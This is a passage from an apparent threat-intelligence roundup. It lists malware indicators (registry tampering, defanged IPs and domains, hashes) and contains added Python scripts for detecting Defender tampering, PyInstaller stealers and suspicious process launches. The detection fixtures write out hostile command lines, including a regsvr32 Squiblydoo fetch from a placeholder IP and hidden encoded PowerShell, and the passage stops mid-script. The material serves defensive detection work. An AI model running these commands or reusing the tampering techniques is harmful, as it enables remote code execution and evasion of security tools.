<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\dwkqpxds
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\cvjpowcr
1
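The Winwebsec registry keys earlier in this post are a textbook set of security-tool tampering values (Security Center overrides and notification suppression, EnableLUA, DisableAntiSpyware, the Start type of wscsvc, WinDefend, wuauserv and luafv), and the Tofsee keys above show the complementary trick: Windows Defender path exclusions for a randomly named drop directory under SysWOW64, plus a service with a random eight-character name. The script below is an added example, not Talos or Cisco tooling, that checks a registry export for both patterns offline. The .reg text embedded in it is constructed: the key and value names are taken from the two tables, while the data written (1 for the overrides, 0 for EnableLUA, 4 = SERVICE_DISABLED for the services, the A1B2C3D4 service name and the Example Corp exclusion) is assumed, because the tables record only which values were touched, not what was written.

```python
"""Check a Windows registry export (.reg text) for the tampering and persistence values
in the Winwebsec and Tofsee tables. Added example, not Talos/Cisco tooling; the embedded
export is constructed (names from the tables; data values, A1B2C3D4 and Example Corp assumed)."""
import re
from collections import Counter, defaultdict

REG_KEY = re.compile(r"^\[(?P<key>[^\]]+)\]$")
REG_VAL = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')
SECURITY_CENTER_OVERRIDES = {"antivirusoverride", "antivirusdisablenotify",
                             "firewalldisablenotify", "firewalloverride", "updatesdisablenotify"}
PROTECTED_SERVICES = {"wscsvc", "windefend", "wuauserv", "luafv"}  # reconfigured by Winwebsec
SERVICE_DISABLED = 4  # SCM start type: 2 = auto, 3 = manual, 4 = disabled (assumed value)
RANDOM_SERVICE = re.compile(r"^[a-z0-9]{8}$")            # table: [A-Z0-9]{8}; keys lowercased here
RANDOM_DIR = re.compile(r"\\syswow64\\[a-z]{8}(\\|$)")  # table: SysWOW64\<random [a-z]{8}>


def _unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg(text):
    """Return {key (lowercased): {value name: data}}; dword -> int, strings unescaped."""
    reg, key = defaultdict(dict), None
    for raw in text.splitlines():
        line = raw.strip()
        if m := REG_KEY.match(line):
            key = m.group("key").lower()
            continue
        m = REG_VAL.match(line)
        if not m or key is None:
            continue
        name = "" if m.group("default") else _unescape(m.group("name"))
        data = m.group("data")
        if data.startswith("dword:"):
            data = int(data[6:], 16)
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            data = _unescape(data[1:-1])
        reg[key][name] = data
    return reg


def find_tampering(reg):
    """Return (rule, key, value name, data) for every value matching one of the patterns."""
    findings = []
    for key, values in reg.items():
        svc = key.rsplit("\\", 1)[-1]  # last path component: the service name under Services
        for name, data in values.items():
            lname = name.lower()
            if key.endswith("\\security center") and lname in SECURITY_CENTER_OVERRIDES and data == 1:
                findings.append(("security-center-override", key, name, data))
            elif key.endswith("\\policies\\system") and lname == "enablelua" and data == 0:
                findings.append(("uac-disabled", key, name, data))
            elif key.endswith("\\windows defender") and lname == "disableantispyware" and data == 1:
                findings.append(("defender-disabled", key, name, data))
            elif key.endswith("\\windows defender\\exclusions\\paths"):
                rule = "defender-exclusion-random-dir" if RANDOM_DIR.search(lname) else "defender-exclusion"
                findings.append((rule, key, name, data))
            elif "\\services\\" in key and lname == "start" and svc in PROTECTED_SERVICES and data == SERVICE_DISABLED:
                findings.append(("protected-service-disabled", key, name, data))
            elif ("\\services\\" in key and lname == "imagepath" and RANDOM_SERVICE.match(svc)
                  and RANDOM_DIR.search(str(data).lower())):
                # Name shape alone is noisy (wuauserv is also 8 chars): require the drop dir too.
                findings.append(("random-service-syswow64", key, name, data))
    return findings


def summarize(findings):
    return Counter(rule for rule, *_ in findings)


SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center]
"AntiVirusOverride"=dword:00000001
"AntiVirusDisableNotify"=dword:00000001
"FirewallOverride"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
"Start"=dword:00000004
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"C:\\Windows\\SysWOW64\\nguazhnc"=dword:00000000
"C:\\Program Files\\Example Corp\\Agent"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\A1B2C3D4]
"Start"=dword:00000002
"ImagePath"="C:\\Windows\\SysWOW64\\nguazhnc\\kdrxwekz.exe"
'''

if __name__ == "__main__":
    for finding in find_tampering(parse_reg(SAMPLE_REG)):
        print(*finding)
```

On a host under triage, `reg export HKLM\SOFTWARE hklm-software.reg` and `reg export HKLM\SYSTEM hklm-system.reg` write UTF-16 files; open them with `encoding="utf-16"` and pass the concatenated text to parse_reg. Note that the Defender exclusion rule reports every exclusion path, not only the random-looking ones, because any exclusion added outside change control deserves a look; the random-directory variant just gets a more specific label.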
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
239[.]255[.]255[.]250 14
43[.]231[.]4[.]7 14
217[.]172[.]179[.]54 14
5[.]9[.]72[.]48 14
130[.]0[.]232[.]208 14
144[.]76[.]108[.]82 14
185[.]253[.]217[.]20 14
45[.]90[.]34[.]87 14
185[.]254[.]190[.]218 14
157[.]240[.]18[.]174 13
176[.]9[.]119[.]47 11
157[.]240[.]2[.]174 10
172[.]217[.]197[.]103 10
172[.]217[.]197[.]147 10
172[.]217[.]197[.]99 10
69[.]31[.]136[.]5 9
104[.]47[.]53[.]36 9
172[.]217[.]197[.]106 8
216[.]239[.]36[.]21 7
64[.]233[.]186[.]26/31 7
142[.]250[.]80[.]4 7
216[.]239[.]32[.]21 6
142[.]250[.]64[.]67 6
172[.]217[.]6[.]195 5
40[.]112[.]72[.]205 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 14
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 14
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 14
249[.]5[.]55[.]69[.]in-addr[.]arpa 14
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 14
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 14
microsoft-com[.]mail[.]protection[.]outlook[.]com 14
microsoft[.]com 14
www[.]google[.]com 14
schema[.]org 13
accounts[.]google[.]com 13
drive[.]google[.]com 13
mail[.]google[.]com 13
maps[.]google[.]com 13
news[.]google[.]com 13
play[.]google[.]com 13
www[.]instagram[.]com 13
www[.]youtube[.]com 13
msr[.]pool-pay[.]com 11
z-p42-instagram[.]c10r[.]facebook[.]com 10
api[.]sendspace[.]com 9
www[.]amazon[.]com 6
alt1[.]gmail-smtp-in[.]l[.]google[.]com 5
ip[.]pr-cy[.]hacklix[.]com 4
117[.]151[.]167[.]12[.]in-addr[.]arpa 4

*See JSON for more IOCs

Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 14
%SystemRoot%\SysWOW64\config\systemprofile:.repos 14
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 14
%System32%\config\systemprofile:.repos 14
%TEMP%\<random, matching '[a-z]{8}'>.exe 14
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 13
%TEMP%\kmhngtd.exe 1
%TEMP%\mojpivf.exe 1
%TEMP%\uwrxqdn.exe 1
%System32%\fylqigw\disnhtqs.exe (copy) 1

File Hashes

2e883c663b7f6b68467090ef1a8ba5f7a0eb127b102e0e8b1025c37c8b411431
404a851964da0c2e16041ccf5c37e0950ab0953d64e31fddefafd4f1b48953ba
588e81418300b2fdd043e679a6f541be70964f8b4accee01cc5f1ce881f9767c
5eb9e051502c6cb3e042a064fb0f862af14b7e44ec5996676a76321753cb8d91
670470962e62bd536a96c7362389d497cf5e3b4381dc53b18d5cb52f3c84caf8
7b92cd620aede5695a26078064d6d0fc55469f3c53b485b0b9d607857498639d
7f4255211344827747bc78ef016ad296fc7e270f3d9a80b507947fdc6ceafaff
8ee2261ae281d00208935cae21d355b3cae217e1bc99bbf7dd3cf606f2af59b1
98755afc02c22780f24c9764aadd5cd868c0817624e93ecabda860cf1dc3c749
a6b5147fc2139d1c09b3bf0bf6ddbdb5db6d17c53f1fc9dd85a9c5fc58d3cd0f
ab21f676f8fe95f0be5a3871b0894599fb222ff821ba8b709e6ddcbdab206900
ca2039d9a0908e0f3d1893354d32373fb72d3d93f8d368a01bf84c963476c63f
df958c4e37ff041e9bbe6af82c4f3f5598ccbce6de52226b47564d47e8aff058
f4c85611333664e8bce06dc4dda7b7a9d023d45748ed1758d9dc779567ea2523

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Spyware.Zbot-9827050-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
1
<HKCU>\SOFTWARE\MICROSOFT\OLEK 1
<HKCU>\SOFTWARE\MICROSOFT\OLEK
Value Name: Cias
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Tewaaliha
1
Mutexes | Occurrences
GLOBAL\{<random GUID>} 1
Local\{<random GUID>} 1
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
13[.]32[.]204[.]55 1
84[.]22[.]106[.]91 1
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
lovelypictures[.]org 1
Files and/or directories created | Occurrences
%TEMP%\tmpc2d707a9.bat 1
%APPDATA%\Ansyb\dinob.exe 1
%TEMP%\tmp53980b63.bat 1
%APPDATA%\Wycie 1
%APPDATA%\Wycie\oqzy.exe 1
%APPDATA%\Ysocge 1
%APPDATA%\Ysocge\namu.fio 1
%APPDATA%\Zaukho 1
%APPDATA%\Zaukho\odix.obz 1

File Hashes

0480b21f505401bb4bd2a9329a72a036335e3561d1f2531413be9bd20bbcaf20
04eef6493e6a9ad7c6e4126e3a8143f78d9e90aa82710b8cec3d1377008f91f2
07d9cafb62568c5c54a974fa05f07351880c57ab005481d7b63c68c3e3d6de63
08cb1b65a32334ad0637c3fe0eed0b236c6563b0af672c8ce6782bb95f283097
10dfae943443013169b63c2cb97d1a2cda1aca5c16f2aab03fe9f93bd03d770c
13a88e93d2eaeedfd6101519b36a92d2c07288003e202317747624e1c3249d2d
17ce351cb7cbcb583e4c7be548f10091a859cb437bf67e92942185e869ec5978
1b9e87e2a015dbe44a7c86e1a5699236edabcb83cf33451f9f13a044405760ce
1c25c91270edbba91c87015028a764d5dc15abeb8e8f8c1ae9f0b0f39427b037
1d4084a48f6e1c603045370ef53c88ecc91df4ad96e17bb9cb30e8f38853feca
25150b54f62aeb9085092bb86d0a620bf6add982c25da4cb2bef75f54fe55015
2a48b97c3efb2927dbc12c30a61e3e03654e638da86e09192b1f254c9aac2c44
2e6ca78531570533c1f96900981e014a4634b0e36a33b02ded912111ad54090d
2e734059a7e45d04f7bf241226e5247d76aafcaa9bdbbfbf21b2755183aaae51
2f50277a394f62b4b841623fd6d288139ca73ff4c854047886e3203b5eaa2379
351ae0358aafd1a319668a638cc0e0ba705e8e43cd468d58fe735d06182dc49a
35fb76eb082424634ac5b1b894961383cce9b01c8bc06647d8778a4fb0a25a50
391919b5030ac42e35006ffde5dfe55ca15bf15432b817ec85202c8dc82d3205
3b433194c6439a28ea94a7c98ca40f0daccb8e36fb92d21c10f1cdc5427fd8ce
4423e0fca37795a7f48b0ea66a319c8c875920a58f631b739d9613b3127363de
444c7ea779e190144b1791793e1a9818a7c962cbbe86cbf380125a5aaecbfc46
4585a4dadab7275da905b73924f41d7fbb25636d31b89afe7cfa72820df99bbb
45dbeeda31394a18a8076919b9aa89196337cd3976bd9e848ca2cf90438e7e21
48ccf3509da653a28eabbc4843ab7814d1a19afcb9d3bbbd63c1d583dff0c6ec
4c90faefa33d63436153e27fc35caee3275165d947e360e84e7352a8b7ead92c

*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Razy-9828691-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys | Occurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT
Value Name: CtrlLogMaxSize
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT
Value Name: CtrlLogMaxSize
11
Mutexes | Occurrences
Global\468c4b2c-bbb3-46b9-bd95-d5da9e8736d3 11
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
184[.]105[.]192[.]2 11
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
lamerpamer[.]org 11
lornointwonbt[.]org 11
rbnvekrer[.]org 11
rnwnbortobw[.]net 11
tinetrinmmm[.]org 11

File Hashes
Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Ransomware.Ruskill-9827186-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 45 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Qoawam
16
Mutexes | Occurrences
-c7c8d521Mutex 26
FvLQ49IlïIyLjj6m 26
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
131[.]253[.]33[.]200 12
13[.]107[.]21[.]200 4
13[.]107[.]22[.]200 2
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
www[.]bing[.]com 26
Files and/or directories created | Occurrences
%APPDATA%\Microsoft\Qoawam.exe 16

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Python-9827194-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
162[.]159[.]129[.]233 6
162[.]159[.]135[.]233 4
54[.]225[.]66[.]103 4
54[.]225[.]220[.]115 3
162[.]159[.]133[.]233 2
162[.]159[.]130[.]233 2
23[.]21[.]126[.]66 2
54[.]235[.]189[.]250 2
162[.]159[.]134[.]233 1
54[.]235[.]83[.]248 1
162[.]159[.]136[.]232 1
162[.]159[.]137[.]232 1
54[.]235[.]142[.]93 1
54[.]243[.]164[.]148 1
54[.]221[.]253[.]252 1
54[.]235[.]147[.]252 1
54[.]225[.]242[.]59 1
Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
api[.]ipify[.]org 17
discordapp[.]com 13
discord[.]com 2
canary[.]discordapp[.]com 2
Files and/or directories created    Occurrences
%APPDATA%\Opera Software\Opera Stable 17
%LOCALAPPDATA%\Google\Chrome\User Data\Default 17
%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default 17
%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\Default 17
%TEMP%\_MEI<pid, matching '[0-9]{1,5}'>\CERTIFI 17
%TEMP%\_MEI17042\_hashlib.pyd 7
%TEMP%\_MEI17042\select.pyd 7
%TEMP%\_MEI17042\unicodedata.pyd 7
%TEMP%\_MEI17042\_socket.pyd 7
%TEMP%\_MEI17042\_ssl.pyd 7
%TEMP%\_MEI17042\VCRUNTIME140.dll 7
%TEMP%\_MEI17042\_bz2.pyd 7
%TEMP%\_MEI17042\_lzma.pyd 7
%TEMP%\_MEI17042\_queue.pyd 7
%TEMP%\_MEI17042\base_library.zip 7
%TEMP%\_MEI17042\pyexpat.pyd 7
%TEMP%\_MEI17042\certifi\cacert.pem 7
%TEMP%\_MEI17042\grabber.exe.manifest 7
%TEMP%\_MEI17042\libcrypto-1_1-x64.dll 7
%TEMP%\_MEI17042\libssl-1_1-x64.dll 7
%TEMP%\_MEI17042\python37.dll 7
%TEMP%\_MEI8202\select.pyd 5
%TEMP%\_MEI8202\unicodedata.pyd 5
%TEMP%\_MEI8202\VCRUNTIME140.dll 5
%TEMP%\_MEI8202\_bz2.pyd 5

*See JSON for more IOCs
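The file and domain IOCs for this family show the shape of a PyInstaller-packed Python stealer: a one-file bundle unpacked into %TEMP%\_MEI<pid>\ (python37.dll, the .pyd modules, certifi's cacert.pem, a grabber.exe.manifest), reads of several browser profile directories, an external-IP lookup against api.ipify.org, and contact with Discord, which such stealers commonly use for webhook exfiltration. The script below is an added example, not Talos code or data from the roundup: it collapses the per-run PID in the _MEI directory name the same way the table above does, refangs defanged indicators, and scores a sandbox run on that combination of behaviors. The sample file lists and domains are constructed, the field names are my own, and the rule that all three signals must co-occur is an assumed heuristic you would tune against your own benign PyInstaller baseline.

```python
import re

# PyInstaller one-file executables unpack their runtime into %TEMP%\_MEI<pid>\ at start-up;
# the PID suffix differs on every run, so it is collapsed before paths are compared or counted.
MEI_DIR_RE = re.compile(r"(\\_MEI)\d{1,5}(\\)")

# Browser profile directories a credential stealer reads (Login Data, Cookies, Local State).
BROWSER_PROFILES = {
    "chrome": r"\Google\Chrome\User Data",
    "brave":  r"\BraveSoftware\Brave-Browser\User Data",
    "yandex": r"\Yandex\YandexBrowser\User Data",
    "opera":  r"\Opera Software\Opera Stable",
}
IP_LOOKUP_DOMAINS = {"api.ipify.org"}
WEBHOOK_DOMAINS = {"discordapp.com", "canary.discordapp.com", "discord.com"}


def refang(indicator):
    """Turn a defanged indicator such as 'api[.]ipify[.]org' back into a matchable domain."""
    return indicator.replace("[.]", ".").lower()


def normalize_path(path):
    """%TEMP%\\_MEI17042\\_ssl.pyd -> %TEMP%\\_MEI<pid>\\_ssl.pyd"""
    return MEI_DIR_RE.sub(r"\g<1><pid>\g<2>", path)


def analyze_run(files_created, domains_contacted):
    """Summarize one sandbox run as a dict of findings plus an overall verdict (assumed heuristic)."""
    lowered = [normalize_path(p).lower() for p in files_created]
    domains = {refang(d) for d in domains_contacted}

    findings = {
        "pyinstaller_bundle": any("\\_mei<pid>\\" in p for p in lowered),
        "bundled_python_runtime": any(re.search(r"\\python3\d+\.dll$", p) for p in lowered),
        "browser_profiles_touched": sorted(
            name for name, marker in BROWSER_PROFILES.items()
            if any(marker.lower() in p for p in lowered)
        ),
        "external_ip_lookup": bool(domains & IP_LOOKUP_DOMAINS),
        "discord_contacted": bool(domains & WEBHOOK_DOMAINS),
    }
    # A PyInstaller bundle on its own is not suspicious; the stealer pattern is the combination.
    findings["likely_python_stealer"] = (
        findings["pyinstaller_bundle"]
        and len(findings["browser_profiles_touched"]) >= 1
        and (findings["external_ip_lookup"] or findings["discord_contacted"])
    )
    return findings


# Constructed sample sandbox output, shaped like the IOC tables above; not data from the roundup.
STEALER_RUN_FILES = [
    r"%TEMP%\_MEI4242\python37.dll",
    r"%TEMP%\_MEI4242\grabber.exe.manifest",
    r"%TEMP%\_MEI4242\certifi\cacert.pem",
    r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data",
    r"%APPDATA%\Opera Software\Opera Stable\Login Data",
]
STEALER_RUN_DOMAINS = ["api[.]ipify[.]org", "discordapp[.]com"]

# A legitimate PyInstaller-packed tool: bundle present, no browser profile access, no webhook traffic.
BENIGN_RUN_FILES = [r"%TEMP%\_MEI9001\python38.dll", r"%TEMP%\_MEI9001\base_library.zip"]
BENIGN_RUN_DOMAINS = ["pypi[.]org"]


if __name__ == "__main__":
    for label, files, domains in (("stealer", STEALER_RUN_FILES, STEALER_RUN_DOMAINS),
                                  ("benign", BENIGN_RUN_FILES, BENIGN_RUN_DOMAINS)):
        print(label, analyze_run(files, domains))
```

The normalization step matters for hunting: without it, each execution of the same sample produces a fresh `_MEI<pid>` path and the file-creation IOCs never aggregate, which is why the table above lists the directory as `_MEI<pid, matching '[0-9]{1,5}'>`.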

File Hashes

0aef6dac17bd51cab73dc81c1324af01c93cef88639486e144eb375982fdedbc
15ef0518ce24192eb65635e51d2a799cc377ccd7f8bbe3b4a754880ffea8db6b
253e96adf953efaf4ad9c1e08cd3a0f6b70cf6e3f4cfd959bf8a5cafc8e44492
276f1222de6935dd18ee96fc13122c1309e835143def3401479f8aa6fb901967
539359ac78d645a537c4b0faa5f947b851342cbfb1267898e842cfdbc60d9cbc
5459f4682054db5fbfce9e1fdc51c0dafc815339dcf789a3e0968e7a9aaccc68
5dcbb25b03756a1fa66bb90c14bee9a588817927040972dc1ecd2a5059c52e1d
689d42f8182bc334ec00f20eff9208ede1441a497ad710e17d9ce81a3f5f2425
6defc8a92376767e4cd80713c134e9190f3e3a7504e8922a08c856832847a4a0
77913aeb24d7b180af0df8cf25c036125a9d7b0f1e4ae2cb7bd356b46d7e015a
7b973e94fa08a21774526c4402931ae9a6e349ab2a4610c623e722f3041f5e2f
7f352d6629ea3ee1bb91149d4d53ea870729f3f2e6aea18c42353b721f2f4a1e
8223db01d392be63e75f9ef42859e149ca70c94c90c04a27ef4445699b1fdcc4
8722939cd4cab4332a8032ecee0d89a70e9128dca5460b58ea8767c9568eb086
884f69f826d3dfc64197d256595a036684447698e9017ce9402dc6e87634e528
b90b0e9214eb6df060bc8857340c56d12104b4b215f3331e4ba532860038dd10
c361892dd847bcca28071d6641fc8c9361f3facc84340c5ecc0041841736d801
c74506861e1203c054e89b2a9ad55b3aa0743ec24ef6da7bf877d38adcbb0b6e
c777d3e771a731760ad226e1becd4c135e24b19c9d30466c7feef4efe0648755
cfc717ae51cff8bd6d9d7e6ff698ec727e502d9a4d6518d6e9e69fa1d96c0681
d34598ae3a06dece7ae6eb70da5517c4e523269e27eac1afed362a2af7a5d322
d69e344b0f9052832f9bd9002752ba0c9d884b27c59c44dedde41317825de750
d7d3b144af1a075d03bec98173c1857e75c6678231451c602cc389848d9cc3f8

Coverage

Product    Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps defend endpoints from the in-memory techniques commonly used by obfuscated malware and exploits. These techniques are designed to bypass conventional anti-virus software, but were blocked by AMP's behavioral and memory protections, which apply even when the underlying vulnerability is a zero-day. The events below are listed with the number of times each was observed during the period.

Crystalbit-Apple DLL double hijack detected - (8905)
A CrystalBit-Apple DLL double hijack was detected. In this attack, the adversary abuses two legitimate vendor applications (here from CrystalBit and Apple) in a DLL double-hijack chain: a fraudulent software bundle drops the legitimate executables alongside malicious DLLs that they load by name, eventually installing a persistent cryptocurrency miner and, in some cases, spyware.
Process hollowing detected - (8791)
Process hollowing is a technique used by malware to evade static analysis and to run under the name of a trusted process. In typical usage, the loader starts a legitimate process (such as a signed Windows binary) in a suspended state, unmaps ("hollows") that process's original image from memory, writes its own unpacked or decrypted payload into the freed address space, points the main thread's entry point at the payload, and then resumes the thread. The malicious code never touches disk in unpacked form, and on-disk scanning of the hosting executable sees only the legitimate file.
Excessively long PowerShell command detected - (2004)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated or Base64-encoded script, has been detected. PowerShell is an extensible Windows scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
A Microsoft Office process has started a windows utility. - (1664)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Dealply adware detected - (602)
DealPly is adware that claims to improve the user's online shopping experience. It is often bundled into otherwise legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.
Kovter injection detected - (511)
Code was injected into a process, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is fileless: its malicious payload is stored in the Windows registry and injected directly into memory using PowerShell rather than being written to disk as an executable. It can detect and report the presence of monitoring software such as Wireshark and of sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (479)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves invoking the trusted, Microsoft-signed regsvr32.exe with an /i: argument pointing at an attacker-controlled URL and scrobj.dll as the module, which causes the scriptlet runtime to fetch and execute remote script content without writing an executable to disk.
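The three detections above (an Office process starting a Windows utility, an excessively long PowerShell command line, and the Squiblydoo regsvr32 pattern) are all expressible as rules over process-creation telemetry. The script below is an added example, not Talos's detection logic or AMP's implementation: it runs three such rules over a handful of constructed process-creation records shaped like Sysmon Event ID 1 or EDR telemetry. The rule names, the list of "Windows utilities" treated as suspicious children, and the 1000-character length threshold are my own assumptions; tune the threshold against your environment's legitimate long PowerShell invocations before deploying anything like it.

```python
import re

# Constructed process-creation events (parent image, child image, child command line).
# These are made-up records for the example, not data from the roundup.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -Enc " + "QQBB" * 800),   # ~3.2 KB encoded blob
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\regsvr32.exe",
     "regsvr32.exe /s /n /u /i:http://203.0.113.5/update.sct scrobj.dll"),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\nightly-backup.ps1"),          # ordinary admin use
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"),           # ordinary COM registration
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
WINDOWS_UTILITIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                     "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
LONG_COMMAND_THRESHOLD = 1000   # characters; assumed tuning value, adjust to your baseline
# regsvr32 /i:<URL> (normally paired with scrobj.dll) makes the scriptlet runtime fetch remote script.
SQUIBLYDOO_RE = re.compile(r"/i:\s*(?:https?|ftp)://", re.IGNORECASE)


def image_name(path):
    """Last path component, lower-cased, so rules are independent of install location."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawned_utility(parent, child, cmdline):
    return image_name(parent) in OFFICE_PARENTS and image_name(child) in WINDOWS_UTILITIES


def excessively_long_powershell(parent, child, cmdline):
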